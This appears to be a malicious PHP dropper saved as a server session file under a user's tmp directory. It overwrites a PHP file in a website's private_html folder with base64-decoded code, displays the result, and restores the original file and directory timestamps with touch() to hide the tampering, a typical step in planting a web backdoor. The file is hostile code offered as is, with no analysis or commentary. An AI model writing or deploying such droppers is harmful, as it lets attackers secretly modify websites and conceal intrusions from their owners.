File: /home/hotjamba/tmp/sess_56dc6113ef3752be0785fd143f68ba1b
<?php echo "<html><head><meta http-equiv='Content-Type' content='text/html; charset=Windows-1251'></head><body>";$filepath = "/home/hotjamba/domains/howtosettlealawsuit.net/private_html/zvkplxnd.php"; $dirpath = @dirname($filepath); $tm = @filemtime($filepath);$mf = @fopen($filepath, "w"); if ($mf) { $txt = base64_decode("PD9waHAgZWNobyAiZXZhbCgpOyI7"); fwrite($mf, $txt); fclose($mf); print("<div>Edited!</div>\n<br>"); } if(file_exists($filepath)) { $txt = file_get_contents($filepath); print("<textarea>$txt</textarea>"); if($tm) { @touch($filepath,$tm,$tm); @touch($dirpath,$tm,$tm); } };echo "Result:OK"; echo "</body></html>"; die;